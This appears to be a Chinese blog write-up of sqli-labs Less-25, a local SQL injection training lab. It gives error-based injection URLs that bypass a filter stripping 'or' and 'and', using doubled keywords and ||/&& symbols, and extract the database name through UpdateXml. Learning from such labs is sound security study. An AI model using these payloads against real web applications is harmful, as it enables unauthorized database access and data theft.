zoukankan      html  css  js  c++  java
  • 【sqli-labs】 less25 GET- Error based -All you OR&AND belong to us -string single quote(GET型基于错误的去除了or和and的单引号注入)

    加单引号

    order by一下

    http://localhost/sqli-labs-master/Less-25/?id=1' order by 1%23

    order by 变成了der by

    下面的hint也显示了过滤后的字符串,其实直接看报错就可以看出来了,虽然标题是屏蔽了or和and,结果order也被误伤了

    由于过滤只是单纯的将or and用空串进行了替换那么构造oorrder by就应该可以通过了

    http://localhost/sqli-labs-master/Less-25/?id=1' oorrder by 1%23

    union select完全没有过滤

    and绕过

    http://localhost/sqli-labs-master/Less-25/?id=1' anandd UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

    上面的绕过方式被称为双写绕过,除此之外,还可以用符号绕过

                    符号          URL编码

    or              ||              %7c%7c

    and           &&           %26%26(GET提交必须编码)

    http://localhost/sqli-labs-master/Less-25/?id=0' || UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
    http://localhost/sqli-labs-master/Less-25/?id=1' %26%26 UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
  • 相关阅读:
    网络爬虫基础练习
    综合练习:词频统计
    画图
    Hadoop综合大作业
    hive基本操作与应用
    理解MapReduce计算构架
    熟悉HBase基本操作
    爬虫大作业
    熟悉常用的HDFS操作
    数据结构化与保存
  • 原文地址:https://www.cnblogs.com/omnis/p/8367060.html
Copyright © 2011-2022 走看看